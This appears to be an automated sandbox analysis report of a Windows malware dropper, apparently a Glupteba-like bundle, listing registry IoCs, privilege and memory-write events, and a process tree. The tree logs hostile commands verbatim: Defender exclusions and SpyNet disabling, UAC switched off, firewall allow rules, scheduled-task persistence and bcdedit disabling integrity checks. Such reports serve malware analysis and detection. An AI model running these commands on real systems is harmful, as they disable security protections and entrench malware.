5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	iLydDdjWvTZucBdjqpLlYCDX.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	file.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	iLydDdjWvTZucBdjqpLlYCDX.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a441400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a319000000010000001000000014c3bd3549ee225aece13734ad8ca0b82000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	file.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1880	powershell.exe
928	gHQRn2JTYFpWYGG8K9d0kIVI.exe
1168	conhost.exe
2720	conhost.exe
2564	gHQRn2JTYFpWYGG8K9d0kIVI.exe
2564	gHQRn2JTYFpWYGG8K9d0kIVI.exe
2564	gHQRn2JTYFpWYGG8K9d0kIVI.exe
2564	gHQRn2JTYFpWYGG8K9d0kIVI.exe
2564	gHQRn2JTYFpWYGG8K9d0kIVI.exe
1168	conhost.exe
1576	Process not Found
1576	Process not Found
1576	Process not Found
1576	Process not Found
1576	Process not Found
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
2580	powershell.EXE
1748	injector.exe
1748	injector.exe
2580	powershell.EXE
2580	powershell.EXE
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1596	csrss.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe
1596	csrss.exe
1748	injector.exe
1596	csrss.exe
1748	injector.exe
1748	injector.exe
1748	injector.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
476	Process not Found

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeDebugPrivilege	2264	file.exe
Token: SeDebugPrivilege	1036	CasPol.exe
Token: SeDebugPrivilege	1880	powershell.exe
Token: SeDebugPrivilege	928	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Token: SeImpersonatePrivilege	928	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Token: SeDebugPrivilege	1168	conhost.exe
Token: SeImpersonatePrivilege	1168	conhost.exe
Token: SeDebugPrivilege	1168	conhost.exe
Token: SeImpersonatePrivilege	1168	conhost.exe
Token: SeSystemEnvironmentPrivilege	1596	csrss.exe
Token: SeDebugPrivilege	2580	powershell.EXE
Token: SeSecurityPrivilege	3056	sc.exe
Token: SeSecurityPrivilege	3056	sc.exe
Token: SeDebugPrivilege	1548	conhost.exe
Token: SeDebugPrivilege	2200	conhost.exe
Token: SeDebugPrivilege	1432	powershell.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2020	BroomSetup.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2264 wrote to memory of 1880	2264	file.exe	28
PID 2264 wrote to memory of 1880	2264	file.exe	28
PID 2264 wrote to memory of 1880	2264	file.exe	28
PID 2264 wrote to memory of 1880	2264	file.exe	28
PID 2264 wrote to memory of 1036	2264	Process not Found	30
PID 2264 wrote to memory of 1036	2264	Process not Found	30
PID 2264 wrote to memory of 1036	2264	Process not Found	30
PID 2264 wrote to memory of 1036	2264	Process not Found	30
PID 2264 wrote to memory of 1036	2264	Process not Found	30
PID 2264 wrote to memory of 1036	2264	Process not Found	30
PID 2264 wrote to memory of 1036	2264	Process not Found	30
PID 2264 wrote to memory of 1036	2264	Process not Found	30
PID 2264 wrote to memory of 1036	2264	Process not Found	30
PID 1036 wrote to memory of 2212	1036	CasPol.exe	31
PID 1036 wrote to memory of 2212	1036	CasPol.exe	31
PID 1036 wrote to memory of 2212	1036	CasPol.exe	31
PID 1036 wrote to memory of 2212	1036	CasPol.exe	31
PID 2212 wrote to memory of 2020	2212	fQ4my349IPbqB9OhEtnjXBuB.exe	32
PID 2212 wrote to memory of 2020	2212	fQ4my349IPbqB9OhEtnjXBuB.exe	32
PID 2212 wrote to memory of 2020	2212	fQ4my349IPbqB9OhEtnjXBuB.exe	32
PID 2212 wrote to memory of 2020	2212	fQ4my349IPbqB9OhEtnjXBuB.exe	32
PID 2212 wrote to memory of 2020	2212	fQ4my349IPbqB9OhEtnjXBuB.exe	32
PID 2212 wrote to memory of 2020	2212	fQ4my349IPbqB9OhEtnjXBuB.exe	32
PID 2212 wrote to memory of 2020	2212	fQ4my349IPbqB9OhEtnjXBuB.exe	32
PID 1036 wrote to memory of 1168	1036	CasPol.exe	197
PID 1036 wrote to memory of 1168	1036	CasPol.exe	197
PID 1036 wrote to memory of 1168	1036	CasPol.exe	197
PID 1036 wrote to memory of 1168	1036	CasPol.exe	197
PID 1036 wrote to memory of 928	1036	CasPol.exe	35
PID 1036 wrote to memory of 928	1036	CasPol.exe	35
PID 1036 wrote to memory of 928	1036	CasPol.exe	35
PID 1036 wrote to memory of 928	1036	CasPol.exe	35
PID 2212 wrote to memory of 2720	2212	fQ4my349IPbqB9OhEtnjXBuB.exe	293
PID 2212 wrote to memory of 2720	2212	fQ4my349IPbqB9OhEtnjXBuB.exe	293
PID 2212 wrote to memory of 2720	2212	fQ4my349IPbqB9OhEtnjXBuB.exe	293
PID 2212 wrote to memory of 2720	2212	fQ4my349IPbqB9OhEtnjXBuB.exe	293
PID 1036 wrote to memory of 1884	1036	CasPol.exe	75
PID 1036 wrote to memory of 1884	1036	CasPol.exe	75
PID 1036 wrote to memory of 1884	1036	CasPol.exe	75
PID 1036 wrote to memory of 1884	1036	CasPol.exe	75
PID 1036 wrote to memory of 1884	1036	CasPol.exe	75
PID 1036 wrote to memory of 1884	1036	CasPol.exe	75
PID 1036 wrote to memory of 1884	1036	CasPol.exe	75
PID 1036 wrote to memory of 3000	1036	CasPol.exe	42
PID 1036 wrote to memory of 3000	1036	CasPol.exe	42
PID 1036 wrote to memory of 3000	1036	CasPol.exe	42
PID 1036 wrote to memory of 3000	1036	CasPol.exe	42
PID 1036 wrote to memory of 3000	1036	CasPol.exe	42
PID 1036 wrote to memory of 3000	1036	CasPol.exe	42
PID 1036 wrote to memory of 3000	1036	CasPol.exe	42
PID 1884 wrote to memory of 2328	1884	Un1eO4zjvXKr6dJVls0c1pcD.exe	74
PID 1884 wrote to memory of 2328	1884	Un1eO4zjvXKr6dJVls0c1pcD.exe	74
PID 1884 wrote to memory of 2328	1884	Un1eO4zjvXKr6dJVls0c1pcD.exe	74
PID 1884 wrote to memory of 2328	1884	Un1eO4zjvXKr6dJVls0c1pcD.exe	74
PID 1884 wrote to memory of 2328	1884	Un1eO4zjvXKr6dJVls0c1pcD.exe	74
PID 1884 wrote to memory of 2328	1884	Un1eO4zjvXKr6dJVls0c1pcD.exe	74
PID 1884 wrote to memory of 2328	1884	Un1eO4zjvXKr6dJVls0c1pcD.exe	74
PID 2564 wrote to memory of 2964	2564	gHQRn2JTYFpWYGG8K9d0kIVI.exe	46
PID 2564 wrote to memory of 2964	2564	gHQRn2JTYFpWYGG8K9d0kIVI.exe	46
PID 2564 wrote to memory of 2964	2564	gHQRn2JTYFpWYGG8K9d0kIVI.exe	46
PID 2564 wrote to memory of 2964	2564	gHQRn2JTYFpWYGG8K9d0kIVI.exe	46
PID 2964 wrote to memory of 2308	2964	cmd.exe	260
PID 2964 wrote to memory of 2308	2964	cmd.exe	260
PID 2964 wrote to memory of 2308	2964	cmd.exe	260

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- UAC bypass
- Windows security bypass
- Windows security modification
- Checks whether UAC is enabled
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2264
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\file.exe" -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1880
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
  2⤵
  - Drops startup file
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1036
- - C:\Users\Admin\Pictures\fQ4my349IPbqB9OhEtnjXBuB.exe
    "C:\Users\Admin\Pictures\fQ4my349IPbqB9OhEtnjXBuB.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2212
  - - C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
      C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:2020
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
        5⤵
        
        PID:796
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        6⤵
        Creates scheduled task(s)
        
        PID:768
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        6⤵
        
        PID:2488
  - - C:\Users\Admin\AppData\Local\Temp\nst4B45.tmp
      C:\Users\Admin\AppData\Local\Temp\nst4B45.tmp
      4⤵
      PID:2720
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nst4B45.tmp" & del "C:\ProgramData\*.dll"" & exit
        5⤵
        
        PID:960
- - C:\Users\Admin\Pictures\1VpqDmudX69c0DZ2U6AYKimg.exe
    "C:\Users\Admin\Pictures\1VpqDmudX69c0DZ2U6AYKimg.exe"
    3⤵
    PID:1168
  - - C:\Users\Admin\Pictures\1VpqDmudX69c0DZ2U6AYKimg.exe
      "C:\Users\Admin\Pictures\1VpqDmudX69c0DZ2U6AYKimg.exe"
      4⤵
      PID:1576
- - C:\Users\Admin\Pictures\gHQRn2JTYFpWYGG8K9d0kIVI.exe
    "C:\Users\Admin\Pictures\gHQRn2JTYFpWYGG8K9d0kIVI.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:928
  - - C:\Users\Admin\Pictures\gHQRn2JTYFpWYGG8K9d0kIVI.exe
      "C:\Users\Admin\Pictures\gHQRn2JTYFpWYGG8K9d0kIVI.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Loads dropped DLL
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2564
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2964
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Manipulates WinMon driver.
        Manipulates WinMonFS driver.
        Drops file in Windows directory
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1596
      - C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        6⤵
        
        PID:1680
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\Sysnative\bcdedit.exe /v
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:2352
      - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:1480
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        Executes dropped EXE
        
        PID:1072
- - C:\Users\Admin\Pictures\jAJMcbS3MO21Yy4W1v5V5ehA.exe
    "C:\Users\Admin\Pictures\jAJMcbS3MO21Yy4W1v5V5ehA.exe" --silent --allusers=0
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3000
- - C:\Users\Admin\Pictures\iLydDdjWvTZucBdjqpLlYCDX.exe
    "C:\Users\Admin\Pictures\iLydDdjWvTZucBdjqpLlYCDX.exe"
    3⤵
    - Executes dropped EXE
    - Modifies system certificate store
    PID:3004
- - C:\Users\Admin\Pictures\oMCJnrnDdRV6m7XbtMyl0qqJ.exe
    "C:\Users\Admin\Pictures\oMCJnrnDdRV6m7XbtMyl0qqJ.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
    3⤵
    - Executes dropped EXE
    PID:2508
- - C:\Users\Admin\Pictures\Un1eO4zjvXKr6dJVls0c1pcD.exe
    "C:\Users\Admin\Pictures\Un1eO4zjvXKr6dJVls0c1pcD.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1884

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240126190559.log C:\Windows\Logs\CBS\CbsPersist_20240126190559.cab
1⤵
PID:1548

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies Windows Firewall
PID:2308

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
1⤵
PID:1060
- C:\Windows\SysWOW64\cmd.exe
  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
  2⤵
  PID:2688
- - \??\c:\windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:352
- - \??\c:\windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2032

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
1⤵
PID:2580
- \??\c:\windows\SysWOW64\reg.exe
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
  2⤵
  PID:2060
- \??\c:\windows\SysWOW64\reg.exe
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
  2⤵
  PID:2988

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
1⤵
PID:2800

C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
1⤵
PID:1504

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:784
- C:\Windows\system32\bcdedit.exe
  C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2920
- C:\Windows\system32\bcdedit.exe
  C:\Windows\system32\bcdedit.exe -timeout 0
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:3012
- C:\Windows\system32\bcdedit.exe
  C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:3052
- C:\Windows\system32\bcdedit.exe
  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2756
- C:\Windows\system32\bcdedit.exe
  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2832
